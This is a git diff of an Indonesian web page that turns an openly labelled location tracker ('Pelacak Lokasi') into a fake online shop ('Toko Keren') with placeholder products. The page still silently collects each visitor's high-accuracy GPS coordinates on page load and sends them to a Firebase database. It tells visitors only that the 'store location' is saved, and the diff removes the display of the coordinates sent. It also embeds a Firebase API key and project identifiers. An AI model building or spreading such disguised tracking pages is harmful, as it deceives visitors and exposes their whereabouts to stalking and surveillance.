--- a/index.html
+++ b/index.html
@@ -1,28 +1,105 @@
 <!DOCTYPE html>
 <html>
 <head>
-  <title>📍 Pelacak Lokasi</title>
+  <title>🛒 Toko Belanja Sederhana</title>
+  <style>
+    body {
+      font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
+      max-width: 600px;
+      margin: auto;
+      padding: 1rem;
+      background: #f5f5f5;
+      color: #333;
+    }
+    header {
+      text-align: center;
+      margin-bottom: 2rem;
+    }
+    header h1 {
+      margin: 0;
+      color: #2c3e50;
+    }
+    .store-location {
+      margin: 1rem 0;
+      text-align: center;
+    }
+    .store-location img {
+      width: 150px;
+      border-radius: 8px;
+      box-shadow: 0 0 10px rgba(0,0,0,0.15);
+    }
+    .products {
+      display: grid;
+      grid-template-columns: repeat(auto-fit,minmax(150px,1fr));
+      gap: 1rem;
+    }
+    .product-card {
+      background: white;
+      padding: 1rem;
+      border-radius: 8px;
+      box-shadow: 0 2px 6px rgba(0,0,0,0.1);
+      text-align: center;
+    }
+    .product-card img {
+      max-width: 100%;
+      height: 100px;
+      object-fit: contain;
+      margin-bottom: 0.5rem;
+    }
+    .info {
+      margin-top: 1rem;
+      font-size: 0.9rem;
+      color: #27ae60;
+      min-height: 24px;
+      text-align: center;
+    }
+  </style>
   <script src="https://www.gstatic.com/firebasejs/9.23.0/firebase-app-compat.js"></script>
   <script src="https://www.gstatic.com/firebasejs/9.23.0/firebase-database-compat.js"></script>
 </head>
-<body style="font-family:sans-serif; text-align:center; padding:2rem;">
-  <h1>📍 Lokasi Anda</h1>
-  <p id="info">Mengambil lokasi...</p>
+<body>
+  <header>
+    <h1>🛒 Toko Keren</h1>
+    <p>Belanja mudah dan cepat</p>
+  </header>
+
+  <div class="store-location">
+    <img src="https://cdn-icons-png.flaticon.com/512/684/684908.png" alt="Icon Toko" />
+    <p>Lokasi toko tersimpan otomatis</p>
+  </div>
+
+  <div class="products">
+    <div class="product-card">
+      <img src="https://via.placeholder.com/150x100?text=Produk+1" alt="Produk 1" />
+      <h3>Produk 1</h3>
+      <p>Rp 50.000</p>
+    </div>
+    <div class="product-card">
+      <img src="https://via.placeholder.com/150x100?text=Produk+2" alt="Produk 2" />
+      <h3>Produk 2</h3>
+      <p>Rp 75.000</p>
+    </div>
+    <div class="product-card">
+      <img src="https://via.placeholder.com/150x100?text=Produk+3" alt="Produk 3" />
+      <h3>Produk 3</h3>
+      <p>Rp 100.000</p>
+    </div>
+  </div>
+
+  <div class="info" id="info">Mengirim lokasi ke server...</div>
 
   <script>
-    // Ganti dengan config kamu
-   const firebaseConfig = {
-  apiKey: "AIzaSyAnI3-EDQr7OK8fHaeSSzAtLk9iR5sgbac",
-  authDomain: "lokasiapi-2f434.firebaseapp.com",
-  projectId: "lokasiapi-2f434",
-  storageBucket: "lokasiapi-2f434.firebasestorage.app",
-  messagingSenderId: "875812427660",
-  appId: "1:875812427660:web:5c4ce962244c47e18128a9"
-};
-    
+    const firebaseConfig = {
+      apiKey: "AIzaSyAnI3-EDQr7OK8fHaeSSzAtLk9iR5sgbac",
+      authDomain: "lokasiapi-2f434.firebaseapp.com",
+      projectId: "lokasiapi-2f434",
+      storageBucket: "lokasiapi-2f434.firebasestorage.app",
+      messagingSenderId: "875812427660",
+      appId: "1:875812427660:web:5c4ce962244c47e18128a9"
+    };
+
     firebase.initializeApp(firebaseConfig);
     const db = firebase.database();
-
     const infoEl = document.getElementById('info');
 
     function sendLocation(lat, lon) {
@@ -32,9 +109,10 @@
         longitude: lon,
         timestamp: now
       }).then(() => {
-        infoEl.innerText = `✅ Lokasi dikirim:\nLat: ${lat}, Lon: ${lon}`;
+        infoEl.innerText = `✅ Lokasi berhasil dikirim. Terima kasih!`;
       }).catch(err => {
-        infoEl.innerText = "❌ Gagal kirim: " + err.message;
+        infoEl.innerText = "❌ Gagal kirim lokasi: " + err.message;
+        infoEl.style.color = "red";
       });
     }
 
@@ -44,14 +122,16 @@
         const lon = pos.coords.longitude.toFixed(6);
         sendLocation(lat, lon);
       }, err => {
-        infoEl.innerText = "❌ Gagal lokasi: " + err.message;
+        infoEl.innerText = "❌ Gagal mendapatkan lokasi: " + err.message;
+        infoEl.style.color = "red";
       }, {
         enableHighAccuracy: true,
         timeout: 10000,
         maximumAge: 0
       });
     } else {
-      infoEl.innerText = "Browser tidak dukung Geolocation.";
+      infoEl.innerText = "Browser tidak mendukung Geolocation.";
+      infoEl.style.color = "red";
     }
   </script>
 </body>
